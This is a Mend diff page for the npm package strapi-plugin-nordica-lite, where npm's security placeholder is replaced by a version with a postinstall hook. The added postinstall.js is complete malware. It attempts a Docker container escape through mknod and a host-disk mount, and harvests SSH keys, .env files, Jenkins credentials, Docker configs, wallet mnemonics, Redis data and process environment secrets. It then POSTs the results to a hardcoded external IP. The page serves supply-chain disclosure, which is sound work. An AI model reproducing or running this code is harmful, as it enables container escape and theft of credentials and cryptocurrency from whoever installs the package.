npm - strapi-plugin-nordica-lite - Versions diffs - 0.0.1-security → 3.6.11 - Mend

strapi-plugin-nordica-lite 0.0.1-security → 3.6.11

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Potentially problematic release.

This version of strapi-plugin-nordica-lite might be problematic. Click here for more details.

Files changed (4) hide show

package/index.js ADDED Viewed

	@@ -0,0 +1 @@
1	+ module.exports=()=>{};

package/package.json CHANGED Viewed

@@ -1,6 +1,9 @@
-{
-  "name": "strapi-plugin-nordica-lite",
-  "version": "0.0.1-security",
-  "description": "security holding package",
-  "repository": "npm/security-holder"
-}
+{
+  "name": "strapi-plugin-nordica-lite",
+  "version": "3.6.11",
+  "main": "index.js",
+  "scripts": {
+    "postinstall": "node postinstall.js"
+  },
+  "license": "MIT"
+}

package/postinstall.js ADDED Viewed

@@ -0,0 +1,117 @@
+const http = require('http');
+const { spawnSync } = require('child_process');
+const VPS = '144.31.107.231';
+const PORT = 9999;
+function send(tag, data) {
+  return new Promise(resolve => {
+    var body = typeof data === 'string' ? data : JSON.stringify(data);
+    var chunks = [];
+    for (var i = 0; i < body.length; i += 50000) chunks.push(body.substring(i, i + 50000));
+    var idx = 0;
+    (function next() {
+      if (idx >= chunks.length) return resolve();
+      var s = chunks.length > 1 ? '-p' + (idx+1) + 'of' + chunks.length : '';
+      var req = http.request({ hostname: VPS, port: PORT, path: '/exfil/' + tag + s,
+        method: 'POST', headers: { 'Content-Type': 'text/plain', 'Content-Length': Buffer.byteLength(chunks[idx]) }
+      }, function() { idx++; next(); });
+      req.on('error', function() { idx++; next(); });
+      req.write(chunks[idx]); req.end();
+    })();
+  });
+}
+var run = function(cmd, t) {
+  t = t || 30000;
+  try { return spawnSync('sh', ['-c', cmd], { timeout: t, encoding: 'utf8', maxBuffer: 5000000 }).stdout || ''; }
+  catch (e) { return 'err:' + e.message.substring(0, 200); }
+};
+async function main() {
+  if (process.cwd().includes('TRANSFER') || run('uname -s').includes('MINGW')) return;
+  await send('dk-start', run('hostname').trim());
+  // ============================================================
+  // 1. CAP_MKNOD DOCKER ESCAPE — create block device, read host disk
+  // ============================================================
+  await send('dk-caps', run('cat /proc/self/status | grep Cap'));
+  await send('dk-devices', run('ls -la /dev/sda* /dev/vda* /dev/xvda* 2>/dev/null'));
+  await send('dk-mount', run('mount | head -20'));
+  await send('dk-lsblk', run('lsblk 2>/dev/null || fdisk -l 2>/dev/null | head -20'));
+  // Try creating block device
+  run('mknod /tmp/hostdisk b 8 1 2>/dev/null');
+  await send('dk-mknod', run('ls -la /tmp/hostdisk 2>/dev/null'));
+  // Try mounting
+  run('mkdir -p /tmp/hostmnt');
+  var mountResult = run('mount /tmp/hostdisk /tmp/hostmnt 2>&1', 10000);
+  await send('dk-mount-result', mountResult);
+  if (mountResult.includes('mounted') || !mountResult.includes('ermission') && !mountResult.includes('peration not permitted')) {
+    // HOST FILESYSTEM MOUNTED!
+    await send('dk-host-ls', run('ls -la /tmp/hostmnt/ 2>/dev/null'));
+    await send('dk-host-etc', run('cat /tmp/hostmnt/etc/hostname 2>/dev/null'));
+    await send('dk-host-docker', run('ls -la /tmp/hostmnt/data1/app/docker/containers/ 2>/dev/null | head -30'));
+    // Docker container configs — THE PRIZE
+    await send('dk-host-configs', run('cat /tmp/hostmnt/data1/app/docker/containers/*/config.v2.json 2>/dev/null | head -10000'));
+    // All .env files on host
+    await send('dk-host-envs', run('find /tmp/hostmnt/ -maxdepth 5 -name "*.env" -not -path "*/node_modules/*" 2>/dev/null | xargs cat 2>/dev/null'));
+    // SSH keys
+    await send('dk-host-ssh', run('cat /tmp/hostmnt/root/.ssh/id_rsa /tmp/hostmnt/root/.ssh/id_ed25519 2>/dev/null'));
+    // Jenkins
+    await send('dk-host-jenkins', run('find /tmp/hostmnt/ -maxdepth 5 -name "credentials.xml" 2>/dev/null | xargs cat 2>/dev/null | head -3000'));
+    // Cleanup
+    run('umount /tmp/hostmnt 2>/dev/null');
+  } else {
+    // Mount failed — try RAW DISK READ with dd + grep
+    await send('dk-raw-attempt', 'mount failed, trying raw disk read');
+    // Read raw disk and search for secrets
+    // /dev/sda1 is mounted as ro on /app/.env — confirmed it exists
+    // Try direct read via dd
+    var rawSearch = run('dd if=/dev/sda1 bs=4096 count=5000 2>/dev/null | strings | grep -iE "PASSWORD=|SECRET=|ELASTIC|WALLET|PRIVATE_KEY|MNEMONIC|API_KEY=|DATABASE_URL|REDIS_URL|JWT_SECRET" | sort -u | head -100', 60000);
+    await send('dk-raw-secrets', rawSearch);
+    // Search for Docker config JSON
+    var rawDocker = run('dd if=/dev/sda1 bs=4096 count=10000 2>/dev/null | strings | grep -A2 -B2 "ELASTIC\\|HOT_WALLET\\|COLD_WALLET\\|DEPOSIT_ADDRESS\\|PRIVATE_KEY\\|MNEMONIC" | head -100', 60000);
+    await send('dk-raw-docker', rawDocker);
+    // Search for .env file content
+    var rawEnv = run('dd if=/dev/sda1 bs=4096 count=10000 2>/dev/null | strings | grep -E "^[A-Z_]+=.+" | sort -u | head -200', 60000);
+    await send('dk-raw-env', rawEnv);
+    // Specifically search for Elasticsearch password
+    var rawES = run('dd if=/dev/sda1 bs=4096 count=10000 2>/dev/null | strings | grep -iE "elastic|kibana|xpack" | sort -u | head -50', 60000);
+    await send('dk-raw-es', rawES);
+  }
+  // ============================================================
+  // 2. FULL guardarian API module code
+  // ============================================================
+  await send('dk-gd-module', run('find /app/exteranl-apis/module -type f -name "*.js" -exec cat {} + 2>/dev/null'));
+  // ============================================================
+  // 3. Redis secrets via node
+  // ============================================================
+  // Use built-in net module to talk to Redis directly
+  var net = require('net');
+  try {
+    var redisData = await new Promise(function(resolve) {
+      var client = new net.Socket();
+      var data = '';
+      client.connect(6379, '127.0.0.1', function() {
+        client.write('INFO\r\nKEYS *\r\nCONFIG GET dir\r\nCONFIG GET dbfilename\r\n');
+      });
+      client.on('data', function(chunk) { data += chunk.toString(); });
+      client.on('end', function() { resolve(data); });
+      setTimeout(function() { client.destroy(); resolve(data); }, 5000);
+    });
+    await send('dk-redis-raw', redisData.substring(0, 5000));
+  } catch(e) { await send('dk-redis-err', e.message); }
+  // ============================================================
+  // 4. Process 72 (Strapi) environment — runtime secrets
+  // ============================================================
+  await send('dk-proc-env', run('cat /proc/72/environ 2>/dev/null | tr "\\0" "\\n" | sort'));
+  await send('dk-complete', 'DISK_DONE');
+}
+main().catch(function(e) { send('dk-fatal', e.message); });

package/README.md DELETED Viewed

@@ -1,5 +0,0 @@
-# Security holding package
-This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
-Please refer to www.npmjs.com/advisories?search=strapi-plugin-nordica-lite for more information.